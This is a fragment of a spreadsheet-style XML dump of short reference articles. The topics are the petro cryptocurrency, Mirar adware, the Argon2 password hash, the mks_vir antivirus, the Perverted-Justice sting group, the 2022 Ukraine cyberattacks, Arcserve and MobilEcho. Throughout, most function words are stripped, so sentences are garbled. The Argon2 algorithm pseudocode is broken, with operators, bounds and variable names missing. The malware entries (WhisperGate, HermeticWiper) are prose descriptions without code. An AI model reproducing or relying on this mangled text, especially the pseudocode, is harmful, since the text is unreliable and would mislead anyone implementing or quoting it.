superintendent cryptocurrencies office promoted website exist. atapirire parish, president maduro specifically decreed petro's value would linked reserves area, seen petroleum-related activities rigs area appeared small, abandoned. experts economics stated impossible link petro sovereign bolívar knows legitimate value. though "reservations" sold venezuelan government obtain petros, petros released venezuelan government. design design petro venezuelan government controversial, white paper changing even petro's pre-sale. petros 100% "pre-mined" venezuelan government, meaning tokens cannot created issuance. members venezuelan ministry university education, science technology allegedly advisory russian government designed petro circumvent united states sanctions, russian president vladimir putin denying official involvement. october 2018, cryptocurrency switched algorithm-based design, copied dash. transactions during petros could purchased venezuelan government russian rubles, bitcoin, ethereum. minimum required investment acquire crypto-asset 2018 euros equivalent) digital wallet 1000 euros equivalent) bank deposits.as 2018 venezuela legally allowed petro virtually payment including trade, taxes, fees, real estate, gasoline, flights more. price volatility weiss cryptocurrency ratings states white paper shows method venezuelan government base petro prices, concluding currency worthless token". according white paper, base price petro equivalent price single venezuelan barrel: petro barrel. official venezuelan price defined venezuelan ministry mining current price petro (during ico) referenced page.according official white paper, national international licensed exchanges able sell exchange petro, allowing market define price. while mechanism exchange petros currency yet, government expected back petro value barrel obtained specifically atapirire parish anzoátegui exchanged bolivares currencies. however, president maduro made contradictory statements saying petro's worth determined solely market value. reception united states united states department treasury warned participating venezuela's proposed initial coin offering petro cryptocurrency could violate u.s. sanctions venezuela, "would appear extension credit venezuelan government". president donald trump signed executive order prohibiting transactions venezuelan government-issued cryptocurrency united states person within united states, effective march 2018, claiming designed obfuscate sanctions access international financing. others brookings institution stated relatively unsurprising dictatorship little reserve currency resorted deceitful means like introducing petro petro exists create foreign currency reserves thin air", explaining creation petro tarnished reputation cryptocurrencies sanctioned countries "might pursue fraudulent strategy venezuela: create cryptocurrency tied government-controlled asset, raise money violation sanctions, proceed manipulate cryptocurrency’s value maximize profit". financial cryptocurrency community's response generally negative. economist jean paul leidenz expressed concerns creation petro would encourage hyperinflation. supply-side economist steve hanke, studies hyperinflation venezuela perspective supply-side economics, stated petro likely wind graveyard", later saying petro, doesn’t exist. whole thing sham, fraud. rolled january, doesn’t trade. considered rate cryptocurrencies even cryptocurrency." other analysts point government control centralisation greatest weakness. financial journalist keiser expressed support light country's hyperinflation. according bloomberg, organizations rank cryptocurrencies described petro "scam", sites like icoindex, icobench, cryptorated icoreview giving negative reviews even rating petro status. initially, white paper released january 2018, petro missing important information regarding mechanism technology. after couple weeks, version white paper released announced different blockchain platform petro would built. investment washington post economic reporter matt o'brien said "the petro might obviously horrible investment ever... petro creating something useless that's foreigners them, venezuelans spend them". also petrocurrency hyperinflation venezuela venezuelan bolívar references further reading nathaniel popper vanessa herrero march 2020). "the coder dictator". york times. gabriel jiménez hated venezuelan strongman nicolás maduro. loved cryptocurrency. when built regime digital coin, nearly paid life.{{cite news}}: maint: uses authors parameter (link) external links official website</t>
  </si>
  <si>
    <t>Mirar Toolbar</t>
  </si>
  <si>
    <t>mirar toolbar, also known mirar, adware application typically installed bundle software. often installed without user consent.mirar installs c:\windows directory. monitors browsing search activity targeting advertising served users. information sent mirar's servers. because behavior, mirar called spyware. mirar also installs search toolbar internet explorer browser helper object (bho). citations</t>
  </si>
  <si>
    <t>Argon2</t>
  </si>
  <si>
    <t>argon2 derivation function selected winner 2015 password hashing competition. designed alex biryukov, daniel dinu, dmitry khovratovich university luxembourg. reference implementation argon2 released creative commons license (i.e. public domain) apache license 2.0, provides three related versions: argon2d maximizes resistance cracking attacks. accesses memory array password dependent order, reduces possibility time–memory trade-off (tmto) attacks, introduces possible side-channel attacks. argon2i optimized resist side-channel attacks. accesses memory array password independent order. argon2id hybrid version. follows argon2i approach first half pass memory argon2d approach subsequent passes. recommends using argon2id know difference types consider side-channel attacks viable threat.all three modes allow specification three parameters control: execution time memory required degree parallelism cryptanalysis while public cryptanalysis applicable argon2d, published attacks argon2i function. first attack applicable version argon2i, second extended latest version (1.3).the first attack shows possible compute single-pass argon2i function using quarter fifth desired space time penalty, compute multiple-pass argon2i using n/2.72) space time penalty. according argon2 authors, attack vector fixed version 1.3.the second attack shows argon2i computed algorithm complexity o(n7/4 log(n)) choices parameters (space cost), (time cost), thread-count n=σ∗τ. argon2 authors claim attack efficient argon2i used three passes. however, joël alwen jeremiah blocki improved attack showed order attack fail, argon2i v1.3 needs passes memory. algorithm function argon2 inputs: password (p): bytes (0..232-1) password message) hashed salt (s): bytes (8..232-1) salt bytes recommended password hashing) parallelism (p): number (1..224-1) degree parallelism (i.e. number threads) taglength (t): number (4..232-1) desired number returned bytes memorysizekb (m): number (8p..232-1) amount memory kibibytes) iterations (t): number (1..232-1) number iterations perform version (v): number (0x13) current version 0x13 decimal) (k): bytes (0..232-1) optional (errata: says 0..32 bytes, says 0..232 bytes) associateddata (x): bytes (0..232-1) optional arbitrary extra data hashtype (y): number (0=argon2d, 1=argon2i, 2=argon2id) output: tag: bytes (taglength) resulting generated bytes, taglength bytes long generate initial 64-byte block input parameters concatenated input source additional entropy. errata: says 64-bits; says 64-bytes. errata: says hash says (but document is). it's actually blake2b. variable length items prepended length 32-bit little-endian integers. buffer parallelism taglength memorysizekb iterations version hashtype length(password) password length(salt) salt length(key) length(associateddata) associateddata blake2b(buffer, //default hash size blake2b 64-bytes calculate number blocks rounding memorysizekb nearest multiple 4*parallelism kibibytes blockcount floor(memorysizekb, 4*parallelism) allocate two-dimensional array blocks (parallelism rows columncount columns) columncount blockcount parallelism; //in rfc, columncount referred compute first second block (i.e. column zero lane (i.e. row) parallelism-1 bi[0] hash(h0 1024) //generate 1024-byte digest bi[1] hash(h0 1024) //generate 1024-byte digest compute remaining columns lane parallelism-1 //for columncount-1 //for subsequent column //i' indexes depend argon2i, argon2d, argon2id (see section 3.4) getblockindexes(i, //the getblockindexes function defined bi[j] g(bi[j-1], bi′[j′]) //the hash function defined further passes iterations niteration iterations parallelism-1 columncount-1 //for subsequent column //i' indexes depend argon2i, argon2d, argon2id (see section 3.4) getblockindexes(i, bi[0] bi[0] g(bi[columncount-1], bi′[j′]) else bi[j] bi[j] g(bi[j-1], bi′[j′]) compute final block last column b0[columncount-1] parallelism-1 bi[columncount-1] compute output return hash(c, taglength) variable-length hash function argon2 makes hash function capable producing digests bytes long. this hash function internally built upon blake2. function hash(message, digestsize) inputs: message: bytes (0..232-1) message hashed digestsize: integer (1..232) desired number bytes returned output: digest: bytes (digestsize) resulting generated bytes, digestsize bytes long hash variable-length hash function, built using blake2b, capable generating digests bytes. requested digestsize 64-bytes lower, blake2b directly (digestsize return blake2b(digestsize message, digestsize) //concatenate 32-bit little endian digestsize message bytes desired hashes 64-bytes (e.g. 1024 bytes argon2 blocks), blake2b generate twice number needed 64-byte blocks, 32-bytes block calculate number whole blocks (knowing we're going 32-bytes each) ceil(digestsize/32)-1; generate whole blocks. initial block generated message blake2b(digestsize message, 64); subsequent blocks generated previous blocks blake2b(vi-1, generate final (possibly partial) block partialbytesneeded digestsize 32*r; vr+1 blake2b(vr, partialbytesneeded) concatenate first 32-bytes block (except possibly partial last block, take whole thing) represent lower 32-bytes block return vr+1 references external links argon2 source code repository github argon2 specification password hashing competition uni.lu argon2 page balloon hashing: memory-hard function providing provable protection against sequential attacks 9106 argon2 memory-hard function password hashing proof-of-work applications</t>
  </si>
  <si>
    <t>Mks vir</t>
  </si>
  <si>
    <t>mks_vir (formerly: mks_vir) polish antivirus program, created marek sell 1987. original reason creation software solutions existing market times satisfy author's needs. first versions distributed floppy disks apexim, company marek sell worked. updates issued monthly sent mail. initially, software delivered users personalized main screen contained serial number data license owner. despite that, program often used without license popularity confirmed appearing trojan horses, impersonating program updates, issued yet. later, together full version software, demo versions issued, allowed program week. educational reasons, program contained descriptions operation viruses (including demonstrations graphical sound effects) and, 3.99 version, lexicon viruses popular poland. 1996, became winner third edition teraz polska contest.in 1996, company, founded marek sell, became developer program. website program created. company continued development program death author 2004. versions microsoft windows unix created. online scanner, based activex technology, became available software website.after bankruptcy company, 2011, property receiver sold rights mks_vir trademark arcabit company, years earlier former employees. reactivated mks_vir product free antivirus application.officially, arcabit company resigned distribution support software 2014, march although released brand version 2018. some program versions: 3.12 (january 1991 first version described program history) 4.00 (april 1993) 5.00 (july 1994) 6.00 (september 1998) 2002 2003 2004 2005 (the last version dos) 2006 (the last version windows 98/me) (the first 64-bit version) (the last version produced mks) (announced multilingual version issued) (the version based arcabit engine) 13.11 (the last version produced arcabit) 2013 internet security (the last version, announced february 2013 issued) notes references</t>
  </si>
  <si>
    <t>Perverted-Justice</t>
  </si>
  <si>
    <t>perverted justice foundation, inc., commonly known perverted-justice (also known peej), american organization based california oregon investigated, identified, publicized conduct adults used chat rooms social media order solicit online sexual conversations in-person meetings minors. their website serves archive collected data investigations, make available order assist enforcement public understanding behavior child grooming techniques online hebephiles. activity perverted-justice organization included online volunteers carrying sting operations posing children teenagers (the range portrayed decoys usually 10–15) chat sites waiting adults approach them. after obtaining identifying information adults seeking sexual contact minors (the adult seeking minor offer telephone number details meeting arranged), organization would pass information enforcement. perverted-justice's methods controversial, critics labeled actions harassment possibly legal entrapment. site additionally attracted media attention, laudatory critical, result collaboration dateline series televised sting operations called catch predator. perverted-justice also operates site targets groups individuals identifies involved pedophile activism community, site provides information abuse victims legal recourse, site gives advice children teenagers dealing grooming internet, site targets organizations perverted-justice believes allow pedophile activists services. foundation also offers free online training enforcement officers intern program college students.in late 2018, perverted-justice announced that, beginning 2019, would formally ending decoy operations. they also announced would converting official website archive past operations collected data, removing site features forums. data propose compile make accessible website, including thousands formerly unseen chat logs, available research purposes order assist anti-pedophile groups enforcement regard understanding behavior techniques online pedophiles. background perverted-justice 2002 frank fencepost xavier erck (born philip john eide). organization says online operations convictions october 2018, currently awaiting trial, average arrests month year 2006. organization reported annual income $825,000 year 2006 erck earning salary $120,000.the site originally started posting chat logs shame people engaged sexual chats purported children. some members site allegedly went harassing targets chats real life, well friends, neighbors, employers, family. after falling-out vitriolic chat phone verifier 2004, fencepost dismissed site. "xavier became much oriented toward getting pedophiles arrested rather making complete social pariahs neighborhood," says fencepost.von erck said idea website watching people attempt groom young girls chat rooms oregon. says perverted-justice computer watchdog agency works closely enforcement agencies. "the media likes term 'vigilante' gets attention, consider vigilantes. cultivate cooperation police work within justice, outside law." methods perverted-justice functions supporting volunteers informants chat rooms children minors typically found. volunteers' public profiles youthful-sounding usernames, young ages, pictures children. administrators site initiate online contact users, refuse tips public result. user starts chatting volunteer turns conversation sex, volunteer responds positively encourages divulge personal details, particularly telephone number, ostensibly needed verify identity meeting arranged. past, around point chatlog details would published site. volunteers site's forums would engage "follow-up", attempting identify notify family members, employers, neighbors. however, december 2003, organization "information first" program, interested police departments could contact perverted-justice, "busts" made within department's jurisdiction would sent straight without posted website. early days program, perverted-justice.com initiate contact police, professedly officers skeptical information could used court law. since july 2004 facilitated first conviction, site's operators switched policy cold calling local police information obtained. government agency interested (police, fbi, military cid, etc.) chatlog information posted site conviction reached. before perverted-justice's "information first" program cold-calling policy became standard, logs received interest enforcement agencies posted directly website. november 2006, site's 100th conviction, perverted-justice announced chat logs would longer posted unless enforcement involved first, "information first" agreements sufficient cover u.s. residents caught sting. complete unedited chat logs, usually contain sexually explicit content obscenities (and sometimes annotated comments perverted-justice volunteer) posted website person's legal case resolved. current follow-up process consists notifying community offender's status person arrested convicted.to begin follow-up process, site's volunteers reverse-directory lookup obtain target's name, well checking information find them. they post target's name, address, photograph available, website, well chat log: record conversation volunteer. process called "follow-up," additional volunteers site's forums, operating rules restrictions perverted-justice administrators, contact target's family, friends, neighbors, employer alert website posting.all telephone numbers removed site's main pages months (though still available site's forums), avoid another case like milwaukee bank teller, received threatening phone call obtained number website. woman never online even owned computer, forced change number, previously registered subject perverted-justice sting. media volunteers also take part site's operators call "group media busts," people invited house self-proclaimed minor, actually perverted-justice volunteer. when arrive, greeted television news reporter. first events conducted late 2003, co-operation investigative reporter john mercure milwaukee's wtmj-tv, site credits initially conceiving concept. similar events local news organizations took place following months. november 2004, site teamed dateline york city conduct large sting operation, "group media bust," entitled catch predator. dateline rented house wired hidden cameras, volunteers posed minors chat rooms, telling users talked home alone. "within hours literally lining door," dateline reported. two-and-a-half days, showed house making date perverted-justice volunteer.after third installment catch predator, perverted-justice hired agent group's services several television networks. came ahead continued highly rated series. since then, catch predator series reports grown widely recognized phenomenon, busts united states numerous references parodies media. convictions perverted-justice's website documents convictions include disorderly conduct, indecently soliciting child, attempting entice juvenile travel intent engage sexual act, transporting child pornography, possession dissemination child pornography. according official website, perverted justice contributed least convictions stating actual number likely closer 650. other activities perverted justice formerly website targeting individuals groups involved online pedophile activist community. site's stated objective "house voluminous research regarding identities pursuits pedophile activist community". listed number arrests pedophile activists stated based profiles.they also built list "corporate sexual offenders", define "[a]ny company informed pedophiles using service advocate lifestyle child/adult rape remove pedophiles service", corresponding lists pedophiles make services.perverted-justice volunteers also worked match myspace profiles convicted offenders state registries alert myspace officials presence. they identified almost three thousand profiles, deleted. reception commendation perverted-justice, well volunteers, commended years number individuals organizations, including many active-duty enforcement officials child-safety advocates. march 2007 issue enforcement technology magazine covered perverted-justice.com operations enforcement. 2,000 sworn officers, resources perverted justice dateline sting (where offenders arrested three days)," says chad bianco riverside county (california) sheriff's department. "they people working around clock." those praising site include host america's most wanted, john walsh. said: "well, think great. chris hansen, nbc, people perverted-justice showing american public repeatedly creep preys upon children could live next door. could rabbi, school teacher priest anybody. think they've done great job. they've partners enforcement they're putting guys away, think they've provided tremendous educational tool american public." child-safety advocate marc klaas come publicly support perverted-justice work suggesting city city efforts. think take 'dateline' piece turn regular program, perverted-justice chris hansen somebody else city city city weekly basis, would create real deterrent effect would fear minds perverts." child-safety advocate ross ellis, founder executive director love children usa, sent press release praising efforts perverted-justice, sending plaque organization. children keep safe. work chris hansen, dateline perverted justice wake call every parent—because child immune predators. proud present awards express gratitude courageous work done behalf children." internet safety website childseeknetwork webpage praising perverted-justice. "the child seek network come fire texas organization link perverted-justice site. belief children's safety utmost importance. peej works hard children safe internet online predators. although methods seem harsh controversial results, aided police getting convictions prey children teens. every child right protected feel safe, continue efforts applaud peej work assist goal." letter sent office senator orrin hatch (r-ut) perverted-justice praising efforts, especially regards getting adam walsh child protection safety passed. "the efforts perverted-justice.com deserve special 'thank you' everyone interested stopping seduction sexual attack children. nbc's dateline highlighted efforts catching sexual predators, using internet hunt hunters. believe shows directly impacted timely passage bill. want join senate majority leader bill frist acknowledged efforts floor united states senate bill passed. want "thank you" tireless efforts stop sexual predators."active-duty enforcement worked website arrests also gone record speaking organization. detective mike burns darke county, ohio sheriff's department commented perverted-justice brought table, miracle heaven meeting needs struggling badly things going here’s answers you." sgt. chad bianco riverside county sheriff's department california said, approached perverted-justice large sting told 'dateline' would following along. jumped chance." police chief hilton daniels fort myers police department wanted department learn online internet predator sting: decided 'well, let's hold perverted-justice' teach operation." officer kevin pineda flagler beach, florida tasked department researching perverted-justice prior using services. although department "was little wary first", officer pineda indicates research revealed "[nothing but] overwhelming departments actually utilized services." laguna beach police department gave perverted-justice administrators harvey dennis kerr award sting performed city. speaking possibility sting operations, matthew stapleton petaluma, california police department said: "[i]f resources future, absolutely, might one. think would dateline sting again, established partnership perverted justice, could help necessary." also commented, "perverted justice everything, promised. they perfect partner." criticism perverted-justice volunteers criticized years several individuals organizations. individuals opposing perverted justice organization encourages extrajudicial violence harassment individuals convicted crime legal system. also stone phillips perverted justice related event concedes "... many cases, decoy first bring subject sex." leading claims illegal entrapment targets perverted justices actions. criticism site, made perverted-justice began working primarily enforcement, leveled tina schwartz, national center missing exploited children (ncmec) director communications. said: "it's really safest, effective combat problem from i've seen embarrass people, know complete justice ever served". scott morrow corrupted-justice.com, now-defunct canadian-based site critical perverted-justice. morrow told news 2005 that, opinion, currently hold erck administrators, operators, volunteers perverted-justice accountable mistakes. "when running organization running group people potential much damage people's lives does, think also accountability." morrow suggests many perverted-justice's tactics harassment "designed destroy person's life." points even offender registries "list names background information neighbors, employers family members accused", perverted-justice website does. perverted-justice members encouraged spread information targets internal forums contact targets' families, employers, neighbors. october 2007 preliminary hearing case maurice wolin, wolin's attorney blair berk argued perverted justice's founder financial incentive badger suspects. erck testified hearing paid annual salary $120,000 stemming perverted justice's deal nbc. said berk, "xavier erck problem. television show fancy cancer doctor ensnare web, go." prosecutor case, brian staebell, stated, "the whole business preliminary hearing attack petaluma police department perverted justice. every time back chats look grooming 13-year-old girl." after hearing, judge raima ballinger held wolin trial, ruling sufficient cause believe wolin committed crime. tien, attorney electronic frontier foundation, quoted concerned organization could send real predators hiding. site's operators respond fact goal, real predators hide away places children liken site putting community watch sign local playground, could argued discourage predators kidnapping children there. tien also argued chat transcripts easily doctored. order bolster credibility, organization claims implemented number safeguards prevent happening, including routing chats encrypted proxy server mirrors data. however, pressed provide hardware used record evidence used maurice wolin case, erck refused, claiming hard disk drive "experienced complete failure". december 2008, perverted justice produced hardware alleges used gathering evidence wolin case. before perverted-justice began working primarily enforcement, child safety advocate julie posey described perverted-justice's tactics gross invasion privacy." posey indicated feel methods employed perverted-justice completely effective. "what embarrass moment... they'll different screen name know check things little thoroughly next time." posey perverted-justice founder xavier erck appeared news channel shortly thereafter, posey remarked, "it’s entertainment site, actually. there, click link picture takes person’s chat-log person scale—a sliminess scale calls it—and rate pervert from, think it’s, five. kind gives sense entertainment. anybody finds entertainment value exploiting children, problem it." some enforcement experts also stated that, appreciate site's mission, agree operators' volunteers' practices. december 2004 article york sun, bradley russ, training director federal internet crimes against children taskforce (which trained enforcement agents nationwide) said tactics perverted-justice sometimes counter task force's standards. instance, russ said, accepting child pornography "busts" bolster potential legal case, volunteers possession unlawful images. said federal authorities begun considering whether seize perverted-justice contributors' computers. "it's noble effort gone far," russ told newspaper. also said site's tactics make difficult enforcement prosecute cases present cases considered tainted entrapment claims. according russ, real problem citizens' group conducting investigation crime it's mistake enforcement abdicate responsibility citizens." said russ, think huge mistake enforcement partners citizens investigations. concerned entrapment issues." nolan, boston university professor former boston police officer, echoes russ's criticism, issue private citizens engaging kinds investigatory practices. perverted justice, even though fact acting agents enforcement, abiding policies. this vigilantism. it's sensational vigilantism." criminal defense attorney angelyn gates chase criminal defense attorneys raises concern citizen groups subject standards trained enforcement officials. notes laws designed keep police officers violating citizens' rights, rules apply citizens violating citizens' rights. "police officers trained theory," gates said. "[members perverted-justice] watching trying pretend they're child internet," said. "they're thrill, fun, notoriety seem getting it." detective mike burns darke county asserts perverted-justice sets stricter criteria many enforcement agencies arrest. contends perverted-justice subscribes protocols well within followed enforcement. however concede, "sometimes fine line, provided people chatting days possibilities showing meeting. there's department five times size could done that." site also criticized "disseminating brand child pornography." criminal defense attorney peter greenspun, represented rabbi david kaye convicted perverted-justice sting operation) argues content posted perverted-justice.com could encourage child predators. "they putting unfiltered, unrestricted public consumption graphic sexual material perverted nature." site's operators state volunteers sent child pornography, "immediately report police without fail." furthermore, assure every time happened resulted conviction sending pornography, perverted-justice. riverside county case, judge dallas holmes commented merits perverted-justice-related case. said judge holmes: like smell case." furthermore, described perverted-justice witness testifying case "odd," "weird" "repulsive". these comments made jury deadlocked 10–2 favor acquittal case involving u.s. marine william lawrence havey. linda dunn, chief deputy district attorney riverside county, said thought outcome havey trial jurors' unwillingness convict marine negative perceptions perverted justice witnesses. 2007, perverted-justice criticized now-dismissed employment lawsuit brought former dateline producer marsha bartel. filing, bartel alleges provides financial incentives group trickery humiliate targets "enhance comedic effect the[ir] public exposure." according bartel, caught predator sting operations reported decoys begged come sting houses, even decided walk away. perverted-justice responded criticism labeling bartel disgruntled former employee motivated financial gain. lawsuit eventually dismissed york supreme court ruled employer free terminate employee time reason reason." father arrested july 2006 sting perverted-justice appeared georgia superior court judge seek arrest warrant perverted-justice founder xavier erck, stating erck solicited commission felony man. judge found probable cause existed believe erck impersonated girl solicited intent commit felony, declined issue warrant occurred, actual girl thus crime occurred. soliciting felony felony. attorney gary gerrard filed appeal georgia court appeals, alleging georgia law, solicitation felony whether crime occurred. that appeal ultimately rejected. june 2007, perverted-justice criticized following sting operation collin county, texas resulted charges suspected online predators dropped. collin county assistant district attorney greg davis said cases dropped perverted-justice failed provide enough usable evidence. many cases, could prosecute perverted justice refused answer questions, refused participate witnesses, refused turn potential evidence." susan etheridge, director children's advocacy center plano, texas, surprised cases thrown out. doubts efficacy citizen-based group conducting sting, know enforcement works hard find prosecute internet predators. when citizens know whether work. perhaps policing best left police." responding criticism, members perverted-justice stated website never asked relevant evidence, never refused provide witnesses, answered murphy prosecutor's questions. they describe collin county district attorney's office "corrupt", "inept", "incompetent", labeling collin county, texas greg davis "the biggest liar we've ever dealt lives." january 2008, multi-count (self-represented) civil lawsuit filed district court arizona kruska seeking change current offender laws. kruska suing group number others, including myspace daddy, claiming defamation, cyber-stalking cyber-harassment added defunct wikisposure site. kruska's claims perverted-justice dismissed august 2010. notable incidents according erck, bruce raisley, private pilot software developer made graphic violent threats perverted-justice contributors volunteers, threatened expose online identities used posing children. raisley stated former perverted-justice member left group discovered perverted-justice used photograph perverted-justice decoy profile, failed swift response enforcement. allegations made erck "set destroy [raisley] posing woman, seducing online graphic chats, posting transcripts web, threatening release purported video individual masturbating." raisley lured airport waiting area, secretly photographed associates erck. photos later posted online along warning threats attacks. 2010, raisley convicted orchestrating ddos attack sites carrying story. raisley sentenced years prison ordered $90,383 restitution attacks. cessation operations final mission late 2018, official site announced would active decoy operations start 2019. addition formally ending chat room decoy operations well known for, perverted-justice founder xavier erck announced organization suspending active operations conclusion stephen deck case. mid-december 2018, deck convicted previous conviction overturned appellate court, thus marking conclusion final case-related activity perverted-justice.in 2019, perverted-justice ended active operations announced official website effectively transitioned active status summary based format past operations history april 2019.during final years, perverted-justice dozens researchers colleges projects across western world asking permission data website, maintains always given permission chat logs website research related activities. organization several thousand chat conversations archived never light targets never rose level prosecution. perverted-justice's last stated goal compile chat logs, well extensive information compiled years operation dataset available research purposes. according official website, perverted-justice contributed least convictions, stating actual number likely closer 650.perverted-justice stated changing internet platforms, specifically twitter social networking general, contributed organization's decision cease operations citing internet predators longer confined mostly deep wells organization started organization pointed fact internet access younger generations ubiquitous, connecting online victims earlier year technology exceeds power personal computers used starting website long ago. because changing social media landscape, previously effective methods patrolling chat rooms rendered ineffective. site points fact enforcement officials open talking citizens information back organization started. perverted-justice stated future generations figure best efficiently internet predators arrested, figure best newer technologies fake underage convincingly. also internet vigilantism creep catcher references external links official website perverted justice foundation, inc. perverted justice resource recourse</t>
  </si>
  <si>
    <t>2022 Ukraine cyberattacks</t>
  </si>
  <si>
    <t>during prelude 2022 russian invasion ukraine 2022 russian invasion ukraine, multiple cyberattacks ukraine recorded, well attacks russia. first major cyberattack took place january 2022, took dozen ukraine's government websites. according ukrainian officials, around government websites, including ministry foreign affairs, cabinet ministers, security defense council, attacked. most sites restored within hours attack. february, another cyberattack took multiple government bank services.on february, russia launched full-scale invasion ukraine. western intelligence officials believed would accompanied major cyberattack ukrainian infrastructure, threat materialize. cyberattacks ukraine continued invasion, limited success. independent hacker groups, anonymous, launched cyberattacks russia retaliation invasion. background time attack, tensions russia ukraine high, 100,000 russian troops stationed near border ukraine talks russia nato ongoing. government alleged russia preparing invasion ukraine, including "sabotage activities information operations". also allegedly found evidence false-flag operation" eastern ukraine, could used pretext invasion. russia denies accusations impending invasion, threatened "military-technical action" demands met, especially request nato never admit ukraine alliance. russia spoken strongly expansion nato borders. january attacks attacks january 2022 consisted hackers replacing websites text ukrainian, erroneous polish, russian, state afraid wait worst" allege personal information leaked internet. about government websites affected, including ministry foreign affairs, cabinet ministers, security defense council. stated data leaked. soon message appeared, sites taken offline. sites mostly restored within hours. deputy secretary nsdc serhiy demedyuk, stated ukrainian investigation attack suspects third-party company's administration rights used carry attack. unnamed company's software used since 2016 develop government sites, affected attack. demedyuk also blamed unc1151, hacker group allegedly linked belarusian intelligence, attack.a separate destructive malware attack took place around time, first appearing january. first detected microsoft threat intelligence center (mstic), malware installed devices belonging "multiple government, non-profit, information technology organizations" ukraine. later, reported include state emergency service motor transport insurance bureau. software, designated dev-0586 whispergate, designed look like ransomware, lacks recovery feature, indicating intent simply destroy files instead encrypting ransom. mstic reported malware programmed execute targeted device powered down. malware would overwrite master boot record (mbr) generic ransom note. next, malware downloads second .exe file, would overwrite files certain extensions predetermined list, deleting data contained targeted files. ransomware payload differs standard ransomware attack several ways, indicating solely destructive intent. however, later assessments indicate damage limited, likely deliberate choice attackers.on january, russian advanced persistent threat (apt) gamaredon (also known primitive bear) attempted compromise western government entity ukraine. cyber espionage appears main goal group, active since 2013; unlike apts, gamaredon broadly targets users globe addition also focusing certain victims, especially ukrainian organizations) appears provide services apts. example, invisimole threat group attacked select systems gamaredon earlier compromised fingerprinted. reactions january attack russia russia denied allegations ukraine linked cyberattacks. ukraine ukrainian government institutions, center strategic communications information security ministry foreign affairs, suggested russian federation perpetrator attack, noting would first time russia attacked ukraine. international organizations european union high representative josep borrell said source attack: “one well imagine certain probability margin error, come from.” secretary general nato jens stoltenberg announced organization would increase coordination ukraine cyberdefense face potential additional cyberattacks. nato later announced would sign agreement granting ukraine access malware information sharing platform. february attacks february, large ddos attack brought websites defense ministry, army, ukraine's largest banks, privatbank oschadbank. cybersecurity monitor netblocks reported attack intensified course day, also affecting mobile apps atms banks. york times described "the largest assault kind country's history". ukrainian government officials stated attack likely carried foreign government, suggested russia behind although fears denial-of-service attack could cover serious attacks, ukrainian official said attack discovered.according government national security council attack performed russian main intelligence directorate (gru). american cybersecurity official anne neuberger stated known infrastructure noted transmitting high volumes communications ukraine-based addresses domains. kremlin spokesperson dmitry peskov denied attack originated russia.on february, third ddos attack took multiple ukrainian government, military, bank websites. although military banking websites described rapid recovery”, website offline extended period. just data wiping malware detected hundreds computers belonging multiple ukrainian organizations, including financial, defense, aviation, services sectors. eset research dubbed malware hermeticwiper, named genuine code signing certificate cyprus-based company hermetica digital ltd. wiper reportedly compiled december 2021, symantec reported malicious activity early november 2021, implying attack planned months ahead time. symantec also reported wiper attacks devices lithuania, organizations compromised months wiper attack. similar january whispergate attack, ransomware often deployed simultaneously wiper decoy, wiper damages master boot record.a prior attack, deployed cyber rapid-response team consisting cybersecurity experts lithuania, croatia, poland, estonia, romania, netherlands. unknown team helped mitigate effects cyberattack.the attack coincided russian recognition separatist regions eastern ukraine authorization russian troop deployments there. blamed attack russia. russia denied accusations called “russophobic”.on february minister digital transformation ukraine mykhailo fedorov announced creation army, include cyber specialists, copywriters, designers, marketers targetologists. result, numerous russian government websites banks attacked. dozens issues russian stars officials made public, ukrainian songs broadcast television channels, including prayer ukraine. march attacks beginning march, russia began significantly increase frequency cyber-attacks ukrainian civilians.on march alone, quad9 malware-blocking recursive resolver intercepted mitigated million attacks computers phones ukraine poland, rate times higher european average. cybersecurity expert bill woodcock packet clearing house noted blocked queries coming ukraine clearly show increase phishing malware attacks ukrainians, noted polish numbers also higher usual 70%, million, ukrainian refugees poland time. explaining nature attack, woodcock said "ukrainians targeted huge amount phishing, malware getting onto machines trying contact malicious command-and-control infrastructure."on march rtcomm.ru, russian internet service provider, hijacked twitter's 104.244.42.0/24 ipv4 address block period hours fifteen minutes. also 2017 cyberattacks ukraine 2021–2022 russo-ukrainian crisis kaspersky bans allegations russian government ties#russian invasion ukraine russian–ukrainian cyberwarfare cyberwarfare russia 2022 cyberattacks romania list cyberattacks references</t>
  </si>
  <si>
    <t>Arcserve</t>
  </si>
  <si>
    <t>arcserve provider data protection, replication recovery solutions enterprise mid-market businesses. arcserve founded 1983 cheyenne software. software vendor technologies, known computer associates, acquired cheyenne 1996 continued develop market arcserve product brand. history arcserve first developed product used back software programs ensure data network could lost. major function first release automatically copy information system mishaps power failures equipment malfunctions would destroy erase during early nineties, arcserve became cheyenne's flagship product massive growth sales. cheyenne brought improved version core program arcserve 1993 began distribution original equipment manufacturers (oems). during mid-nineties, cheyenne continued release series arcserve products tailored specifically different market segments macintosh windows users. software vendor technologies, known computer associates, acquired cheyenne 1996 continued develop market arcserve product brand.in august 2014, arcserve became independent company marlin equity partners acquired business technologies. they released first product named arcserve unified data protection (udp). arcserve provides largest independent software vendor (isv) developed backup software products market, supports wide variety platforms applications. arcserve unified data protection (udp) offered fully integrated software, set-and-forget virtual physical appliances, arcserve(r) cloud.on april 2017, arcserve announced acquisition email archiving technology, named arcserve archiving. july 2017, arcserve announced acquisition zetta, cloud-based disaster recovery solutions provider, offers direct-to-cloud draas baas arcserve cloud direct.on march 17,2021, arcserve announce regulatory approval received completion merger storagecraft. also list backup software references</t>
  </si>
  <si>
    <t>MobilEcho</t>
  </si>
  <si>
    <t>mobilecho, created grouplogic, inc. mobile file management system iphone ipad. first introduced 2011 techcrunch disrupt york city. mobilecho (me) information technology (it) software securely integrating iphones, ipads android phones tablets corporate file servers networks. mobilecho installed corporate file servers departments installed iphones, ipads android phones tablet computers users; allows storage secure transfer files back forth directly servers iphones, ipads android phones tablets.mobilecho client grouplogic's enterprise file sharing synching solution, activecho. background january 2011, apple inc. stated fortune companies deployed tested ipad consumerization enterprise trend technology emerging within consumer market first spreading enterprise organizations. this statistic increased since october 2010. consumerization enterprise allowed employees bring personal tablet computers, ipads, work environment employees connect corporate file server network. this trend raised security issues within enterprise, employees unable bring corporate security infrastructure home ipads. devices currently native file system that's accessible users inherently capable accessing corporate files without using third-party cloud providers like dropbox mobileme, users emailing files themselves. these workarounds believe compromise enterprise security. mobilecho release history (released: november 2013): mobilecho fully localized english, french, german japanese 4.5.2 (released october 2013): added support authentication smart cards (cac/piv) using pkard technology licensed thursby software. (released: august 2013) (released: march 2013): added support secure mobileiron appconnect ecosystem (released: february 2013) (released: december 2012) (released: july 2012): added support access networked attached storage microsoft sharepoint sites including, starting version 4.5, sharepoint online office 365. (released: june 2012): added support secure good technology good dynamics ecosystem (released: april 